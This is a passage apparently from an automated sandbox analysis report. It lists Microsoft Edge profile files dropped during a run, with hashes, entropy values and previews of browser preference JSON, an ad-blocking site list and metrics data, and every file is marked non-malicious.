Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4de47f4a-babb-4b4b-b927-e8a504d2a76c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45510
Entropy (8bit):	6.093467647299687
Encrypted:	false
SSDEEP:	768:LDXzgWPsj/qlGJqIY8GB4x9Y8/5hDO6vP6OUHxcSCRbAicGoup1Xl3jVzXr4CCAd:L/Ps+wsI7yO9Y560gchu3VlXr4CRo4
MD5:	7ED6C8120F8D4B29E76D715D7C9FB985
SHA1:	E41D6180C4E669BFE20BAB73D1C42C0B48F9EB6F
SHA-256:	0FBE6BF36DB24E28D95C3E326EAED81B27BA59466B5603AF26B0CF61329D0FAF
SHA-512:	B60BF167F6597A0B6C75264FED77E1E64EB7429EAD16F8A3F9761533537EA55F21BECE368FF990BB17339AD640948FBF311AD0CC1F8895D055F90337228CE224
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\51ef9c73-de6c-475a-8b08-4e307b33dea5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44604
Entropy (8bit):	6.096146104820881
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBFwushDO6vP6OUjZcfu+tU7bcGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEr60/chu3VlXr4CRo1
MD5:	9B5FC6073AA7696D486735E3FD63DAF8
SHA1:	B5A7B77ACDE23523CF7B2135F82396EF4199FCD4
SHA-256:	C80E197BB242608615E98D8A45988A49A8CD61D000D43E910002E014303F2164
SHA-512:	D5955F8DB5AA58C02A411EA1AF67C0CCED7D072930758B63B2DA7080364565C56689A138422A362C781D9CFE78FF02008CD1D5C5C41A35A900E203CEEE2C7B8D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6e685579-8f31-43ae-b983-bd526ecacd27.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	47198
Entropy (8bit):	6.090639062315054
Encrypted:	false
SSDEEP:	768:mM7X2zt1jOXtXi3zahc9Y8/5hDO6vP6OUHxcSCRbAiHPor+YNgisz6nCAo2GoupE:mMSzMtXija+9Y560gHPordgisziRo2hV
MD5:	A9B5AE13709C17D71BB31D631089099C
SHA1:	45BC30A34704716B7699737F9687A7B510BF79E7
SHA-256:	DACB47AA4D9A50095D0B58C9688E2763177D138A3797CFCAF299E67FC9E0D206
SHA-512:	50F06BA86C296E0BD1294116822F9833A2EE5F4B25192AD18D0B5831D1393D2A9F498C30B655292B04F799A3EE4B75EB37BCF008D0CCC2998C10A9417A0F98F9
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\747bb18b-c00c-4b88-b113-b1d420341288.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44660
Entropy (8bit):	6.096210315535403
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkB1wushDO6vP6OUHxcSCRbAicGoup1Xl3jVzXr4CCz:z/Ps+wsI7yOEb60gchu3VlXr4CRo1
MD5:	EBF9201E47537BC9CF113A0821B7CF9C
SHA1:	F8732613EADC780C1AB6CDE5AC2575B5331EBE38
SHA-256:	808BDC8E89CCF8F033C2C8FB47A72BEB41B4BD477709B1A0CBC0E2DDECB1D01B
SHA-512:	262D3DE05AE95E23F45134D23674707AB8BC4C9B72349BF969D1F8B6103DFE308257460725795DCD19EF075AC5AF38F952F091DBB95E5A25C7B807E8A7F2F243
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\91d3d70f-9eb8-4386-854c-a4ab02879f03.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	47198
Entropy (8bit):	6.090644357232665
Encrypted:	false
SSDEEP:	768:mM7X2zt1jOXtXi3zahc9Y8ethDO6vP6OUHxcSCRbAiHPor+YNgisz6nCAo2GoupE:mMSzMtXija+9YU60gHPordgisziRo2hV
MD5:	E1071D51C0B788650296D8542F43DC1E
SHA1:	C7270DDBD4DA4F19024BC3E1D6A4A42A6A6F306C
SHA-256:	736793CCD83E8A9D4CEC5FF144E72411D4F853878BF24F8D5866CE71DA7FCA8D
SHA-512:	A9582ADDE151B0528C166E9B52F5626C1D20EFC164B67095027BB211BCA191E05BFF1C206722D528AD88CFBA244B6089F4F5D3300F54F7BCB0768D3A61B7AE1A
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\2df0c6d4-ef35-46e3-9220-4446a5b17daa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640152892265458
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7s:fwUQC5VwBIiElEd2K57P7s
MD5:	21CD56820995C4514E60CF6C82134DFC
SHA1:	A474999736344AA8AEA008407B41931EEBD8DCAD
SHA-256:	98615125BD47487A65491F2C4A8EE0C4B5292D510883CE63CE6B7EA1A4CDF1C8
SHA-512:	81135B67AAE29842C59867D614923BE960D2B69AFABEBC2694D86E39C6CCAEBA789BE9EA3245E67418378E8754674B638502FFC77D7ED1C9A6F1C64DF4525969
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640152892265458
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7s:fwUQC5VwBIiElEd2K57P7s
MD5:	21CD56820995C4514E60CF6C82134DFC
SHA1:	A474999736344AA8AEA008407B41931EEBD8DCAD
SHA-256:	98615125BD47487A65491F2C4A8EE0C4B5292D510883CE63CE6B7EA1A4CDF1C8
SHA-512:	81135B67AAE29842C59867D614923BE960D2B69AFABEBC2694D86E39C6CCAEBA789BE9EA3245E67418378E8754674B638502FFC77D7ED1C9A6F1C64DF4525969
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66A3E683-D7C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.46608167963494596
Encrypted:	false
SSDEEP:	6144:oRKtC61BFqNjaHoviZ2+Rqqx+Q3jvBaH:LqNOJZzDo
MD5:	DD5A490BBE85948542F1B9CA24C771E5
SHA1:	C09BE773D6FDE2E1A0A7BCEDE3E3D5BE2F672229
SHA-256:	A3C6F111F909AA0C9A28BF9C059505B2B9A9C8DC83EAA5760B6D271844F6C260
SHA-512:	B85F498108ED6B713913C29A126406A7D42B4336337802C36B1C0A8E72C6161D92EAEA4FE161E1C36071E2C29A0814EB96213FAE93166B5FDB4DA5AFD9D8892C
Malicious:	false
Preview:	...@..@...@.....C.].....@...............H>...=..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".xdaypp20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K..>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2..........~...... .2........V......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0cd7089b-5209-4a37-a170-1008d98337ae.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13597
Entropy (8bit):	5.280120019287643
Encrypted:	false
SSDEEP:	384:stjPGooSuTs9rfhodr4bG/2Wt6WmlaTY4:sFOofuIrfyr4bGOIkaTY4
MD5:	EF8108F7D20C7F04B00003024D5110B0
SHA1:	C18F8F1CFF9399604820087B99C1DAEE68CD4DA9
SHA-256:	60D650DC0DD4F3906EEE969328DDFC557A65CF0F8D27EC8824126264FA8F7113
SHA-512:	C8F059E06DC73D95015BE49DA461B13EFC6C1F4D9DE605ABBCC693B983424E9E992C597EA5DFD14529B175135535BA0F4FF6C0B0A040C84FEF4569CFCAC10EA3
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5f9dcf90-6a80-4d55-ba2f-4e77f5406ea6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.570117335916099
Encrypted:	false
SSDEEP:	768:rmJ1aEWP+Mfe58F1+UoAYDCx9Tuqh0VfUC9xbog/OVoYzWmrw3vp8btuQ:rmJ1aEWP+Mfe5u1jaD4WjktH
MD5:	3818C5445B3C335D37428F29EEB7EEB3
SHA1:	8B580213643DB7391332FFA658C2C81F009A76D0
SHA-256:	87913EA947E03C87D0EB7D1DD4EC93879E5017C6B0D4FBA7903218F16B7DB027
SHA-512:	1358501CEC0EFE7162A4ABC90C2261688AB130100B544C4850A701262C8A6037E7B7FEBBD3478F82471F054A5288B5B8ED8A66065585396250374938D99850D8
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366491011613564","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366491011613564","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\73cb7326-9079-400e-9f82-d4e1dd56d864.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13407
Entropy (8bit):	5.2830948919462815
Encrypted:	false
SSDEEP:	192:stjJ99QTryDi6o5abatSuyAs9rsZihodrMkS3s8qbV+F+GwAvt6WPiaFIMYFPVYJ:stjPG6oSuTs9rfhodr7bG3wWt6WqaTY4
MD5:	2AD7E8524F370FA79340640AB8EE6373
SHA1:	376CC60CF4DE1D7AB33E65BAA3F4B27FD261151B
SHA-256:	961A088A4A31161F5C72C2844CB3BD47B7AEC37BCD0928A1D0A08C8B4B5F699F
SHA-512:	B1FD60C415417B907384DEBDC6C709B5E2B2FE7B65729CDDCC256F1D9D797586F3972EF9D838935861B9F13E29146E40CD3C8CA8A8B5F05B6D9F03A3866F3CEC
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7442bae4-7e11-47e7-bd17-c9a0eff37070.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\829165cd-2a92-4eba-b90b-c15dd0416ac1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	5.112993284878022
Encrypted:	false
SSDEEP:	192:stjkdAs9rsZihUk13s8gbV+FQ6QA66WSiaFIMYFPVYJ:stjbs9rfh8bGFQx6WDaTY4
MD5:	7FCAA517D40906F1A7DF285131AFF087
SHA1:	69FE236B3B2EB7C4CCED0294C97B6AD583AC1DAE
SHA-256:	EB1B36A7DB9F85BB1396F4029EF08BE7F8AE2A54348BC8B9CCF4948AF3FAA6FC
SHA-512:	20F722E8C79EAB6E46307CF0D341CF90A87D5F40B3A6A80E40ABD72D4183207BE0569E7FAA4CA2B53CF250BB7B77FABA00FEBE72F482B014ECCB584767A70A54
Malicious:	false
